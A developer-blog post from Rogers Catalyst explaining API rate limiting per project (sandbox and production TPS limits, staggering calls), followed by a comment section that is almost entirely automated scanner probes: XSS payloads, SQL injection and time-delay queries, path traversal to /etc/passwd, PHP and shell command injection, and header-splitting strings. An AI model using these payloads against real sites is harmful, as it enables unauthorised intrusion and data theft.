Rogers Catalyst

 
null
29
Jun
2011
 

API Rate Limiting Demystified

Posted by Vishal
 

About this Blog Post

Rate limiting is a measure of number of API calls allowed in a given period of time. With adoption by Yahoo, Twitter and Facebook, Rate Limiting has emerged as a best practice that allows web service providers to manage scale and service availability of the service. In this blog post I will shed some light on how rate limiting works for Rogers Catalyst.

Developer Profile and Project

As part of your Registration process at www.rogerscatalyst.com, you are required to create a Developer Profile and one or more Projects associated with your Developer Profile. The Developer Profile represents your business entity and the project represents your application. 


TPS and Projects

Every project is associated with a policy that allows us to manage the business relationship with the developer. One of the attributes of this relationship is the allowed Transaction Per Second (TPS) rate. As the name suggests, TPS is a measure of the number of API calls allowed in one second and this is the mechanism for implementing Rate Limiting for Rogers Catalyst.


Sandbox vs. Production TPS

When you get set up on Catalyst your project is allocated a Sandbox policy. In the Sandbox your project is allowed 1 TPS. When you are ready to launch your project you can push your project to Production. In Production mode the default policy allows up to 3 TPS.  It is important to note that the TPS rate works at a project level so if you have two projects in Production you have access to 3 TPS for each project.  This is another reason why it is a good idea to build each service as a separate project.

Staggering API Calls

Although in theory your application can push the maximum TPS allowed by your policy, you are more likely to get better performance if you stagger your API calls. In the event you receive a rate limiting error, you should reduce the rate at which you are submitting transactions and re-try. This situation has most likely arisen because your application server’s clock is not synchronized with the Catalyst clock so for any particular run the one-second window on the application server might not overlap with the one second window on Catalyst server. This is especially applicable for applications that do bulk or batch transactions.

 
 
Tags:
 

Comments

October 5, 2016 4:03 AM
 
1
 
 
 
 
October 5, 2016 4:19 AM
 
1
 
 
 
 
October 5, 2016 4:19 AM
 
"><qss>
 
 
 
 
October 5, 2016 4:19 AM
 
1"'><qss>
 
 
 
 
October 5, 2016 4:19 AM
 
1
 
 
 
 
October 5, 2016 4:19 AM
 
1
 
 
 
 
October 5, 2016 4:19 AM
 
z--><qss>
 
 
 
 
October 5, 2016 4:19 AM
 
"'><qss `;!--=&{()}>
 
 
 
 
October 5, 2016 4:19 AM
 
1
 
 
 
 
October 5, 2016 4:19 AM
 
<script>_q=random(X166836516Y2Z)</script>
 
 
 
 
October 5, 2016 4:19 AM
 
1
 
 
 
 
October 5, 2016 4:19 AM
 
1 <script>_q_q=random()</script>
 
 
 
 
October 5, 2016 4:19 AM
 
1
 
 
 
 
October 5, 2016 4:19 AM
 
<script src=//localhost/j>
 
 
 
 
October 5, 2016 4:19 AM
 
1
 
 
 
 
October 5, 2016 4:19 AM
 
<script =">" SRC=//localhost/j>
 
 
 
 
October 5, 2016 4:19 AM
 
1
 
 
 
 
October 5, 2016 4:20 AM
 
<SCRIPT/QSS SRC=//localhost/j>
 
 
 
 
October 5, 2016 4:20 AM
 
1
 
 
 
 
October 5, 2016 4:20 AM
 
"'><<SCRIPT a=2>qss=7;//<</SCRIPT>
 
 
 
 
October 5, 2016 4:20 AM
 
1
 
 
 
 
October 5, 2016 4:20 AM
 
<IMG SRC=javascript:qss=7>
 
 
 
 
October 5, 2016 4:20 AM
 
1
 
 
 
 
October 5, 2016 4:20 AM
 
1
 
 
 
 
October 5, 2016 4:20 AM
 
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:qss=7">
 
 
 
 
October 5, 2016 4:20 AM
 
1
 
 
 
 
October 5, 2016 4:20 AM
 
1"><DIV STYLE="width:expression(qss=7)">
 
 
 
 
October 5, 2016 4:20 AM
 
1
 
 
 
 
October 5, 2016 4:20 AM
 
1
 
 
 
 
October 5, 2016 4:20 AM
 
<EMBED SRC=//localhost/q.swf AllowScriptAccess=always></EMBED>
 
 
 
 
October 5, 2016 4:20 AM
 
1
 
 
 
 
October 5, 2016 4:20 AM
 
"'><qss a=X166836516Y2Z>
 
 
 
 
October 5, 2016 4:20 AM
 
1
 
 
 
 
October 5, 2016 4:20 AM
 
' onEvent=X166836516Y2Z
 
 
 
 
October 5, 2016 4:20 AM
 
" onEvent=X166836516Y2Z
 
 
 
 
October 5, 2016 4:20 AM
 
1
 
 
 
 
October 5, 2016 4:20 AM
 
<
script a=4>qss=7<
/script>
 
 
 
 
October 5, 2016 4:21 AM
 
%3cscript z%3e_q(y)%3c/script%3e
 
 
 
 
October 5, 2016 4:21 AM
 
1
 
 
 
 
October 5, 2016 4:21 AM
 
<script src=http://localhost/j
 
 
 
 
October 5, 2016 4:21 AM
 
1
 
 
 
 
October 5, 2016 4:21 AM
 
q
Content-Type:text/html
Content-Length: 190

HTTP/1.1 200 OK
Content-Type: text/html
Set-Cookie: a=q
Content-Length: 2

AA
 
 
 
 
October 5, 2016 4:21 AM
 
1'
 
 
 
 
October 5, 2016 4:21 AM
 
1
 
 
 
 
October 5, 2016 4:21 AM
 
;--
 
 
 
 
October 5, 2016 4:21 AM
 
1
 
 
 
 
October 5, 2016 4:21 AM
 
#
 
 
 
 
October 5, 2016 4:21 AM
 
1
 
 
 
 
October 5, 2016 4:21 AM
 
/*
 
 
 
 
October 5, 2016 4:21 AM
 
1
 
 
 
 
October 5, 2016 4:21 AM
 
``
 
 
 
 
October 5, 2016 4:21 AM
 
1
 
 
 
 
October 5, 2016 4:21 AM
 
,
 
 
 
 
October 5, 2016 4:21 AM
 
1
 
 
 
 
October 5, 2016 4:21 AM
 
(
 
 
 
 
October 5, 2016 4:21 AM
 
1
 
 
 
 
October 5, 2016 4:21 AM
 
1e309
 
 
 
 
October 5, 2016 4:21 AM
 
1
 
 
 
 
October 5, 2016 4:21 AM
 
 
 
 
 
October 5, 2016 4:21 AM
 
1
 
 
 
 
October 5, 2016 4:21 AM
 
/../../../../../../../etc/passwd
 
 
 
 
October 5, 2016 4:21 AM
 
1
 
 
 
 
October 5, 2016 4:21 AM
 
/../../../../../../../etc/passwd
 
 
 
 
October 5, 2016 4:21 AM
 
1
 
 
 
 
October 5, 2016 4:21 AM
 
../../../../../../../etc/passwd
 
 
 
 
October 5, 2016 4:21 AM
 
1
 
 
 
 
October 5, 2016 4:21 AM
 
//..//..//..//..//..//..//..//etc/passwd
 
 
 
 
October 5, 2016 4:21 AM
 
1
 
 
 
 
October 5, 2016 4:21 AM
 
//....//....//....//....//....//....//....//etc/passwd
 
 
 
 
October 5, 2016 4:21 AM
 
1
 
 
 
 
October 5, 2016 4:21 AM
 
../../../../../../../Windows/System32/drivers/etc/hosts
 
 
 
 
October 5, 2016 4:21 AM
 
1
 
 
 
 
October 5, 2016 4:21 AM
 
a(){}phpinfo(); function a
 
 
 
 
October 5, 2016 4:21 AM
 
1
 
 
 
 
October 5, 2016 4:21 AM
 
|netstat -an
 
 
 
 
October 5, 2016 4:21 AM
 
1
 
 
 
 
October 5, 2016 4:21 AM
 
http://rfitest/
 
 
 
 
October 5, 2016 4:21 AM
 
1
 
 
 
 
October 5, 2016 4:21 AM
 
javascript:qxss(X166836516Y2Z);
 
 
 
 
October 5, 2016 4:21 AM
 
1
 
 
 
 
October 5, 2016 4:21 AM
 
";(function(){qxss});//
 
 
 
 
October 5, 2016 4:21 AM
 
1
 
 
 
 
October 5, 2016 4:21 AM
 
");(function(){qxss});//
 
 
 
 
October 5, 2016 4:21 AM
 
1
 
 
 
 
October 5, 2016 4:21 AM
 
';(function(){qxss});//
 
 
 
 
October 5, 2016 4:21 AM
 
1
 
 
 
 
October 5, 2016 4:22 AM
 
9;(function(){qxss});//
 
 
 
 
October 5, 2016 4:22 AM
 
1
 
 
 
 
October 5, 2016 4:22 AM
 
9
;(function(){qxss});//
 
 
 
 
October 5, 2016 4:22 AM
 
1
 
 
 
 
October 5, 2016 4:22 AM
 
*/;(function(){qxss});/*
 
 
 
 
October 5, 2016 4:22 AM
 
1
 
 
 
 
October 5, 2016 4:22 AM
 
1') or 2=2 --
 
 
 
 
October 5, 2016 4:22 AM
 
1
 
 
 
 
October 5, 2016 4:22 AM
 
1') and 2=1 --
 
 
 
 
October 5, 2016 4:22 AM
 
1') /* or */oR 2=1 + 1 -- aND 2=2 + 1
 
 
 
 
October 5, 2016 4:22 AM
 
1') /* or */aND 2=2 + 1 -- oR 2=1 + 1
 
 
 
 
October 5, 2016 4:22 AM
 
1' or 3=3 --
 
 
 
 
October 5, 2016 4:22 AM
 
1' and 3=2 --
 
 
 
 
October 5, 2016 4:22 AM
 
1' /* or */oR 3=2 + 1 -- aND 3=3 + 1
 
 
 
 
October 5, 2016 4:22 AM
 
1' /* or */aND 3=3 + 1 -- oR 3=2 + 1
 
 
 
 
October 5, 2016 4:22 AM
 
1
 
 
 
 
October 5, 2016 4:22 AM
 
1 or 4=4 --
 
 
 
 
October 5, 2016 4:22 AM
 
1 and 4=3 --
 
 
 
 
October 5, 2016 4:22 AM
 
1 /* or */oR 4=3 + 1 -- aND 4=4 + 1
 
 
 
 
October 5, 2016 4:22 AM
 
1 /* or */aND 4=4 + 1 -- oR 4=3 + 1
 
 
 
 
October 5, 2016 4:22 AM
 
1
 
 
 
 
October 5, 2016 4:22 AM
 
1 or NULL IS NULL
 
 
 
 
October 5, 2016 4:22 AM
 
1
 
 
 
 
October 5, 2016 4:22 AM
 
1 or 6 IS NULL
 
 
 
 
October 5, 2016 4:22 AM
 
1
 
 
 
 
October 5, 2016 4:22 AM
 
1 oR 5=4 + 1
 
 
 
 
October 5, 2016 4:22 AM
 
1
 
 
 
 
October 5, 2016 4:22 AM
 
1 oR 5=5 + 1
 
 
 
 
October 5, 2016 4:22 AM
 
1
 
 
 
 
October 5, 2016 4:22 AM
 
1 and NULL IS NULL
 
 
 
 
October 5, 2016 4:22 AM
 
1
 
 
 
 
October 5, 2016 4:22 AM
 
1 and 7 IS NULL
 
 
 
 
October 5, 2016 4:22 AM
 
1
 
 
 
 
October 5, 2016 4:22 AM
 
1 aND 8=7 + 1
 
 
 
 
October 5, 2016 4:22 AM
 
1 aND 7=7 + 1
 
 
 
 
October 5, 2016 4:22 AM
 
1') or 's'='s
 
 
 
 
October 5, 2016 4:22 AM
 
1
 
 
 
 
October 5, 2016 4:22 AM
 
1
 
 
 
 
October 5, 2016 4:22 AM
 
1
 
 
 
 
October 5, 2016 4:22 AM
 
1
 
 
 
 
October 5, 2016 4:23 AM
 
1' or 't'='t
 
 
 
 
October 5, 2016 4:23 AM
 
1
 
 
 
 
October 5, 2016 4:23 AM
 
1' and 'x'='t
 
 
 
 
October 5, 2016 4:23 AM
 
1
 
 
 
 
October 5, 2016 4:23 AM
 
1' /* or */oR ' aND x'=' aND x
 
 
 
 
October 5, 2016 4:23 AM
 
1
 
 
 
 
October 5, 2016 4:23 AM
 
1' /* or */aND ' oR t'=' aND v
 
 
 
 
October 5, 2016 4:23 AM
 
1
 
 
 
 
October 5, 2016 4:23 AM
 
1 or 'p'='p
 
 
 
 
October 5, 2016 4:23 AM
 
1 and 'y'='p
 
 
 
 
October 5, 2016 4:23 AM
 
1
 
 
 
 
October 5, 2016 4:23 AM
 
1
 
 
 
 
October 5, 2016 4:23 AM
 
1
 
 
 
 
October 5, 2016 4:23 AM
 
1
 
 
 
 
October 5, 2016 4:23 AM
 
11 or 11=11
 
 
 
 
October 5, 2016 4:23 AM
 
1
 
 
 
 
October 5, 2016 4:23 AM
 
11 or 11=12
 
 
 
 
October 5, 2016 4:23 AM
 
1
 
 
 
 
October 5, 2016 4:23 AM
 
15 oR 9=8 + 1
 
 
 
 
October 5, 2016 4:23 AM
 
1
 
 
 
 
October 5, 2016 4:23 AM
 
15 oR 9=9 + 1
 
 
 
 
October 5, 2016 4:23 AM
 
1
 
 
 
 
October 5, 2016 4:23 AM
 
ping -c2 -i90 localhost
 
 
 
 
October 5, 2016 4:23 AM
 
1
 
 
 
 
October 5, 2016 4:23 AM
 
|ping -c2 -i90 localhost
 
 
 
 
October 5, 2016 4:23 AM
 
1
 
 
 
 
October 5, 2016 4:23 AM
 
|ping -c2 -i90 localhost|
 
 
 
 
October 5, 2016 4:23 AM
 
1
 
 
 
 
October 5, 2016 4:24 AM
 
1WAITFOR DELAY '00:00:28'
 
 
 
 
October 5, 2016 4:24 AM
 
1
 
 
 
 
October 5, 2016 4:24 AM
 
1;WAITFOR DELAY '00:00:28';
 
 
 
 
October 5, 2016 4:24 AM
 
1
 
 
 
 
October 5, 2016 4:24 AM
 
1);WAITFOR DELAY '00:00:28'--
 
 
 
 
October 5, 2016 4:24 AM
 
1
 
 
 
 
October 5, 2016 4:24 AM
 
1';WAITFOR DELAY '00:00:28'--
 
 
 
 
October 5, 2016 4:24 AM
 
1
 
 
 
 
October 5, 2016 4:24 AM
 
1');WAITFOR DELAY '00:00:28'--
 
 
 
 
October 5, 2016 4:24 AM
 
1
 
 
 
 
October 5, 2016 4:24 AM
 
1',0,0);WAITFOR DELAY'00:00:28'--
 
 
 
 
October 5, 2016 4:24 AM
 
1
 
 
 
 
October 5, 2016 4:24 AM
 
1 + (SELECT 0 FROM (SELECT SLEEP(28))qsqli_1111)
 
 
 
 
October 5, 2016 4:24 AM
 
1
 
 
 
 
October 5, 2016 4:25 AM
 
1' + (SELECT 0 FROM (SELECT SLEEP(28))qsqli_2222) + '
 
 
 
 
October 5, 2016 4:25 AM
 
1
 
 
 
 
October 5, 2016 4:45 AM
 
1
 
 
 
 
October 5, 2016 4:59 AM
 
1
 
 
 
 
March 1, 2017 4:15 AM
 
1
 
 
 
 
March 1, 2017 12:37 PM
 
"><>
 
 
 
 
March 1, 2017 12:37 PM
 
1"'><>
 
 
 
 
March 1, 2017 12:37 PM
 
1
 
 
 
 
March 1, 2017 12:37 PM
 
1
 
 
 
 
March 1, 2017 12:37 PM
 
"'>< `;!--=&{()}>
 
 
 
 
March 1, 2017 12:37 PM
 
1
 
 
 
 
March 1, 2017 12:37 PM
 
1
 
 
 
 
March 1, 2017 12:37 PM
 
1
 
 
 
 
March 1, 2017 12:37 PM
 
1
 
 
 
 
March 1, 2017 12:37 PM
 
1
 
 
 
 
March 1, 2017 12:37 PM
 
1
 
 
 
 
March 1, 2017 12:37 PM
 
1
 
 
 
 
March 1, 2017 12:38 PM
 
"'><=7;//<
 
 
 
 
March 1, 2017 12:38 PM
 
1
 
 
 
 
March 1, 2017 12:38 PM
 
1
 
 
 
 
March 1, 2017 12:38 PM
 
<META HTTP-EQUIV="refresh" CONTENT="0;url==7">
 
 
 
 
March 1, 2017 12:38 PM
 
1
 
 
 
 
March 1, 2017 12:38 PM
 
1
 
 
 
 
March 1, 2017 12:38 PM
 
1"><DIV STYLE="width:">
 
 
 
 
March 1, 2017 12:38 PM
 
<STYLE type="text/css" a=3>BODY{background:url("=7")}</STYLE>
 
 
 
 
March 1, 2017 12:38 PM
 
1
 
 
 
 
March 1, 2017 12:38 PM
 
1
 
 
 
 
March 1, 2017 12:38 PM
 
"'>< a=X3048166872Y2Z>
 
 
 
 
March 1, 2017 12:38 PM
 
1
 
 
 
 
March 1, 2017 12:38 PM
 
' X3048166872Y2Z
 
 
 
 
March 1, 2017 12:38 PM
 
1
 
 
 
 
March 1, 2017 12:38 PM
 
1
 
 
 
 
March 1, 2017 12:38 PM
 
" X3048166872Y2Z
 
 
 
 
March 1, 2017 12:38 PM
 
1
 
 
 
 
March 1, 2017 12:38 PM
 
<
script a=4>=7<
/script>
 
 
 
 
March 1, 2017 12:38 PM
 
1
 
 
 
 
March 1, 2017 12:38 PM
 
_q(y)
 
 
 
 
March 1, 2017 12:38 PM
 
<script src=http://localhost/j
 
 
 
 
March 1, 2017 12:38 PM
 
q
Content-Type:text/html
Content-Length: 190

HTTP/1.1 200 OK
Content-Type: text/html
Set-Cookie: a=q
Content-Length: 2

AA
 
 
 
 
March 1, 2017 12:38 PM
 
1
 
 
 
 
March 1, 2017 12:38 PM
 
1'
 
 
 
 
March 1, 2017 12:38 PM
 
1
 
 
 
 
March 1, 2017 12:38 PM
 
1
 
 
 
 
March 1, 2017 12:38 PM
 
#
 
 
 
 
March 1, 2017 12:38 PM
 
1
 
 
 
 
March 1, 2017 12:38 PM
 
/*
 
 
 
 
March 1, 2017 12:38 PM
 
``
 
 
 
 
March 1, 2017 12:38 PM
 
1
 
 
 
 
March 1, 2017 12:38 PM
 
1
 
 
 
 
March 1, 2017 12:38 PM
 
,
 
 
 
 
March 1, 2017 12:38 PM
 
1
 
 
 
 
March 1, 2017 12:38 PM
 
1e309
 
 
 
 
March 1, 2017 12:38 PM
 
1
 
 
 
 
March 1, 2017 12:38 PM
 
1
 
 
 
 
March 1, 2017 12:38 PM
 
1
 
 
 
 
March 1, 2017 12:38 PM
 
/../../../../../../../etc/passwd
 
 
 
 
March 1, 2017 12:38 PM
 
../../../../../../../etc/passwd
 
 
 
 
March 1, 2017 12:38 PM
 
1
 
 
 
 
March 1, 2017 12:38 PM
 
1
 
 
 
 
March 1, 2017 12:38 PM
 
//....//....//....//....//....//....//....//etc/passwd
 
 
 
 
March 1, 2017 12:38 PM
 
../../../../../../../Windows/System32/drivers/etc/hosts
 
 
 
 
March 1, 2017 12:38 PM
 
a(){}phpinfo(); function a
 
 
 
 
March 1, 2017 12:38 PM
 
1
 
 
 
 
March 1, 2017 12:38 PM
 
|netstat -an
 
 
 
 
March 1, 2017 12:38 PM
 
1
 
 
 
 
March 1, 2017 12:38 PM
 
http://rfitest/
 
 
 
 
March 1, 2017 12:38 PM
 
1
 
 
 
 
March 1, 2017 12:38 PM
 
qxss(X3048166872Y2Z);
 
 
 
 
March 1, 2017 12:38 PM
 
1
 
 
 
 
March 1, 2017 12:38 PM
 
";(function(){qxss});//
 
 
 
 
March 1, 2017 12:38 PM
 
1
 
 
 
 
March 1, 2017 12:38 PM
 
1
 
 
 
 
March 1, 2017 12:38 PM
 
';(function(){qxss});//
 
 
 
 
March 1, 2017 12:39 PM
 
1
 
 
 
 
March 1, 2017 12:39 PM
 
9;(function(){qxss});//
 
 
 
 
March 1, 2017 12:39 PM
 
9
;(function(){qxss});//
 
 
 
 
March 1, 2017 12:39 PM
 
1
 
 
 
 
March 1, 2017 12:39 PM
 
*/;(function(){qxss});/*
 
 
 
 
March 1, 2017 12:39 PM
 
1
 
 
 
 
March 1, 2017 12:39 PM
 
1') or 2=2 --
 
 
 
 
March 1, 2017 12:39 PM
 
1
 
 
 
 
March 1, 2017 12:39 PM
 
1
 
 
 
 
March 1, 2017 12:39 PM
 
1
 
 
 
 
March 1, 2017 12:39 PM
 
1
 
 
 
 
March 1, 2017 12:39 PM
 
1' or 3=3 --
 
 
 
 
March 1, 2017 12:39 PM
 
1' and 3=2 --
 
 
 
 
March 1, 2017 12:39 PM
 
1
 
 
 
 
March 1, 2017 12:39 PM
 
1
 
 
 
 
March 1, 2017 12:39 PM
 
1
 
 
 
 
March 1, 2017 12:39 PM
 
1
 
 
 
 
March 1, 2017 12:39 PM
 
1 or 4=4 --
 
 
 
 
March 1, 2017 12:39 PM
 
1
 
 
 
 
March 1, 2017 12:39 PM
 
1
 
 
 
 
March 1, 2017 12:39 PM
 
1
 
 
 
 
March 1, 2017 12:39 PM
 
1
 
 
 
 
March 1, 2017 12:39 PM
 
1 or NULL IS NULL
 
 
 
 
March 1, 2017 12:39 PM
 
1
 
 
 
 
March 1, 2017 12:39 PM
 
1
 
 
 
 
March 1, 2017 12:39 PM
 
1
 
 
 
 
March 1, 2017 12:39 PM
 
1
 
 
 
 
March 1, 2017 12:39 PM
 
1 and NULL IS NULL
 
 
 
 
March 1, 2017 12:39 PM
 
1 and 7 IS NULL
 
 
 
 
March 1, 2017 12:39 PM
 
1 aND 8=7 + 1
 
 
 
 
March 1, 2017 12:39 PM
 
1 aND 7=7 + 1
 
 
 
 
March 1, 2017 12:39 PM
 
1') or 's'='s
 
 
 
 
March 1, 2017 12:39 PM
 
1') and 'w'='s
 
 
 
 
March 1, 2017 12:39 PM
 
1
 
 
 
 
March 1, 2017 12:39 PM
 
1
 
 
 
 
March 1, 2017 12:39 PM
 
1
 
 
 
 
March 1, 2017 12:39 PM
 
1
 
 
 
 
March 1, 2017 12:39 PM
 
1' or 't'='t
 
 
 
 
March 1, 2017 12:39 PM
 
1' and 'x'='t
 
 
 
 
March 1, 2017 12:39 PM
 
1' /* or */oR ' aND x'=' aND x
 
 
 
 
March 1, 2017 12:39 PM
 
1' /* or */aND ' oR t'=' aND v
 
 
 
 
March 1, 2017 12:39 PM
 
1
 
 
 
 
March 1, 2017 12:39 PM
 
1 or 'p'='p
 
 
 
 
March 1, 2017 12:39 PM
 
1 and 'y'='p
 
 
 
 
March 1, 2017 12:39 PM
 
1 /* or */oR ' aND c'LIKE' aND c
 
 
 
 
March 1, 2017 12:39 PM
 
1 /* or */aND ' oR d'LIKE' aND e
 
 
 
 
March 1, 2017 12:39 PM
 
1
 
 
 
 
March 1, 2017 12:39 PM
 
11 or 11=11
 
 
 
 
March 1, 2017 12:39 PM
 
1
 
 
 
 
March 1, 2017 12:39 PM
 
1
 
 
 
 
March 1, 2017 12:39 PM
 
1
 
 
 
 
March 1, 2017 12:39 PM
 
1
 
 
 
 
March 1, 2017 12:39 PM
 
ping -c2 -i90 localhost
 
 
 
 
March 1, 2017 12:39 PM
 
1
 
 
 
 
March 1, 2017 12:39 PM
 
|ping -c2 -i90 localhost
 
 
 
 
March 1, 2017 12:39 PM
 
1
 
 
 
 
March 1, 2017 12:39 PM
 
|ping -c2 -i90 localhost|
 
 
 
 
March 1, 2017 12:39 PM
 
1
 
 
 
 
March 1, 2017 12:39 PM
 
1WAITFOR DELAY '00:00:28'
 
 
 
 
March 1, 2017 12:39 PM
 
1
 
 
 
 
March 1, 2017 12:39 PM
 
1;WAITFOR DELAY '00:00:28';
 
 
 
 
March 1, 2017 12:39 PM
 
1
 
 
 
 
March 1, 2017 12:39 PM
 
1);WAITFOR DELAY '00:00:28'--
 
 
 
 
March 1, 2017 12:39 PM
 
1
 
 
 
 
March 1, 2017 12:40 PM
 
1';WAITFOR DELAY '00:00:28'--
 
 
 
 
March 1, 2017 12:40 PM
 
1
 
 
 
 
March 1, 2017 12:40 PM
 
1');WAITFOR DELAY '00:00:28'--
 
 
 
 
March 1, 2017 12:40 PM
 
1
 
 
 
 
March 1, 2017 12:40 PM
 
1',0,0);WAITFOR DELAY'00:00:28'--
 
 
 
 
March 1, 2017 12:40 PM
 
1
 
 
 
 
March 1, 2017 12:40 PM
 
1 + (SELECT 0 FROM (SELECT SLEEP(28))qsqli_1111)
 
 
 
 
March 1, 2017 12:40 PM
 
1
 
 
 
 
March 1, 2017 12:40 PM
 
1' + (SELECT 0 FROM (SELECT SLEEP(28))qsqli_2222) + '
 
 
 
 
March 1, 2017 12:40 PM
 
1
 
 
 
 
March 1, 2017 1:02 PM
 
1
 
 
 
 
March 1, 2017 1:02 PM
 
1
 
 
 
 
March 1, 2017 1:02 PM
 
1
 
 
 
 
March 1, 2017 2:03 PM
 
1
 
 
 
 
April 28, 2017 10:23 AM
 
1
 
 
 
 
June 7, 2017 4:34 AM
 
1
 
 
 
 
June 7, 2017 5:12 PM
 
">
 
 
 
 
June 7, 2017 5:12 PM
 
1"'>
 
 
 
 
June 7, 2017 5:12 PM
 
z-->
 
 
 
 
June 7, 2017 5:12 PM
 
1
 
 
 
 
June 7, 2017 5:12 PM
 
"'>
 
 
 
 
June 7, 2017 5:12 PM
 
1
 
 
 
 
June 7, 2017 5:13 PM
 
1
 
 
 
 
June 7, 2017 5:13 PM
 
1
 
 
 
 
June 7, 2017 5:13 PM
 
1
 
 
 
 
June 7, 2017 5:13 PM
 
1
 
 
 
 
June 7, 2017 5:13 PM
 
"'><=7;//<
 
 
 
 
June 7, 2017 5:13 PM
 
<IMG SRC==7>
 
 
 
 
June 7, 2017 5:13 PM
 
<META HTTP-EQUIV="refresh" CONTENT="0;url==7">
 
 
 
 
June 7, 2017 5:13 PM
 
1
 
 
 
 
June 7, 2017 5:13 PM
 
<STYLE type="text/css" a=3>BODY{background:url("=7")}</STYLE>
 
 
 
 
June 7, 2017 5:13 PM
 
1
 
 
 
 
June 7, 2017 5:14 PM
 
1
 
 
 
 
June 7, 2017 5:14 PM
 
"'>
 
 
 
 
June 7, 2017 5:14 PM
 
' X3050521980Y2Z
 
 
 
 
June 7, 2017 5:14 PM
 
" X3050521980Y2Z
 
 
 
 
June 7, 2017 5:14 PM
 
<
script a=4>=7<
/script>
 
 
 
 
June 7, 2017 5:14 PM
 
1
 
 
 
 
June 7, 2017 5:14 PM
 
http://localhost/j
 
 
 
 
June 7, 2017 5:14 PM
 
1
 
 
 
 
June 7, 2017 5:14 PM
 
1
 
 
 
 
June 7, 2017 5:15 PM
 
;--
 
 
 
 
June 7, 2017 5:15 PM
 
#
 
 
 
 
June 7, 2017 5:15 PM
 
/*
 
 
 
 
June 7, 2017 5:15 PM
 
1
 
 
 
 
June 7, 2017 5:15 PM
 
``
 
 
 
 
June 7, 2017 5:15 PM
 
,
 
 
 
 
June 7, 2017 5:15 PM
 
(
 
 
 
 
June 7, 2017 5:15 PM
 
1e309
 
 
 
 
June 7, 2017 5:15 PM
 
1
 
 
 
 
June 7, 2017 5:16 PM
 
/../../../../../../../etc/passwd
 
 
 
 
June 7, 2017 5:16 PM
 
1
 
 
 
 
June 7, 2017 5:16 PM
 
/../../../../../../../etc/passwd
 
 
 
 
June 7, 2017 5:16 PM
 
../../../../../../../etc/passwd
 
 
 
 
June 7, 2017 5:16 PM
 
//..//..//..//..//..//..//..//etc/passwd
 
 
 
 
June 7, 2017 5:16 PM
 
1
 
 
 
 
June 7, 2017 5:16 PM
 
../../../../../../../Windows/System32/drivers/etc/hosts
 
 
 
 
June 7, 2017 5:16 PM
 
1
 
 
 
 
June 7, 2017 5:16 PM
 
a(){}phpinfo(); function a
 
 
 
 
June 7, 2017 5:16 PM
 
|netstat -an
 
 
 
 
June 7, 2017 5:16 PM
 
1
 
 
 
 
June 7, 2017 5:17 PM
 
qxss(X3050521980Y2Z);
 
 
 
 
June 7, 2017 5:17 PM
 
";(function(){qxss});//
 
 
 
 
June 7, 2017 5:17 PM
 
");(function(){qxss});//
 
 
 
 
June 7, 2017 5:17 PM
 
';(function(){qxss});//
 
 
 
 
June 7, 2017 5:17 PM
 
9;(function(){qxss});//
 
 
 
 
June 7, 2017 5:17 PM
 
9
;(function(){qxss});//
 
 
 
 
June 7, 2017 5:17 PM
 
*/;(function(){qxss});/*
 
 
 
 
June 7, 2017 5:18 PM
 
1') or 2634=2634 --
 
 
 
 
June 7, 2017 5:18 PM
 
1') and 2634=1123 --
 
 
 
 
June 7, 2017 5:18 PM
 
1') /* or __Q_1__ */oR 2634=1511 + 1123 -- aND 1124
 
 
 
 
June 7, 2017 5:18 PM
 
1') /* or __Q_1__ */aND 2634=1511 + 1124 -- oR 1123
 
 
 
 
June 7, 2017 5:18 PM
 
1') /* or __Q_2__ */Or NULL IS NULL-- AnD 5867
 
 
 
 
June 7, 2017 5:18 PM
 
1') /* or __Q_2__ */AnD 5867 IS NULL-- Or NULL
 
 
 
 
June 7, 2017 5:18 PM
 
1' or 3789=3789 --
 
 
 
 
June 7, 2017 5:18 PM
 
1' and 3789=1391 --
 
 
 
 
June 7, 2017 5:18 PM
 
1' /* or __Q_1__ */oR 3789=2398 + 1391 -- aND 1390
 
 
 
 
June 7, 2017 5:18 PM
 
1
 
 
 
 
June 7, 2017 5:18 PM
 
1 or 4325=4325 --
 
 
 
 
June 7, 2017 5:18 PM
 
1 and 4325=2728 --
 
 
 
 
June 7, 2017 5:18 PM
 
1 /* or __Q_1__ */oR 4325=1597 + 2728 -- aND 2729
 
 
 
 
June 7, 2017 5:18 PM
 
1 /* or __Q_1__ */aND 4325=1597 + 2729 -- oR 2728
 
 
 
 
June 7, 2017 5:18 PM
 
1 /* or __Q_2__ */Or NULL IS NULL -- AnD 3251
 
 
 
 
June 7, 2017 5:18 PM
 
1 /* or __Q_2__ */AnD 3251 IS NULL -- Or
 
 
 
 
June 7, 2017 5:18 PM
 
1 or NULL IS NULL
 
 
 
 
June 7, 2017 5:18 PM
 
1 or 6248 IS NULL
 
 
 
 
June 7, 2017 5:18 PM
 
1
 
 
 
 
June 7, 2017 5:19 PM
 
1 and NULL IS NULL
 
 
 
 
June 7, 2017 5:19 PM
 
1 and 7248 IS NULL
 
 
 
 
June 7, 2017 5:19 PM
 
1 aND 7248=2491 + 4757
 
 
 
 
June 7, 2017 5:19 PM
 
1 aND 7248=2491 + 4756
 
 
 
 
June 7, 2017 5:19 PM
 
1 AnD 7248=7248
 
 
 
 
June 7, 2017 5:19 PM
 
1 AnD 7248=4757
 
 
 
 
June 7, 2017 5:19 PM
 
1') or 'swqtp'='swqtp
 
 
 
 
June 7, 2017 5:19 PM
 
1') and 'swqtp'='ptqws
 
 
 
 
June 7, 2017 5:19 PM
 
1') /* or __Q_1__ */oR ' aND ptqws'=' aND ptqws
 
 
 
 
June 7, 2017 5:19 PM
 
1') /* or __Q_1__ */aND ' oR tyhjg'=' aND tyhgd
 
 
 
 
June 7, 2017 5:19 PM
 
1') /* or __Q_2__ */Or ' AnD aghjk'LIKE' AnD aghjk
 
 
 
 
June 7, 2017 5:19 PM
 
1') /* or __Q_2__ */AnD ' Or aghjk'LIKE' AnD jlgdf
 
 
 
 
June 7, 2017 5:19 PM
 
1' or 'tpklq'='tpklq
 
 
 
 
June 7, 2017 5:19 PM
 
1' and 'tpklq'='xqlkp
 
 
 
 
June 7, 2017 5:19 PM
 
1' /* or __Q_1__ */oR ' aND xqlkp'=' aND xqlkp
 
 
 
 
June 7, 2017 5:19 PM
 
1' /* or __Q_1__ */aND ' oR mktrs'=' aND ljhgy
 
 
 
 
June 7, 2017 5:19 PM
 
1' /* or __Q_2__ */Or ' AnD mjnfg'LIKE' AnD mjnfg
 
 
 
 
June 7, 2017 5:19 PM
 
1' /* or __Q_2__ */AnD ' Or mjnfg'LIKE' AnD fhdgr
 
 
 
 
June 7, 2017 5:19 PM
 
11 or 11=11
 
 
 
 
June 7, 2017 5:19 PM
 
11 or 11=12
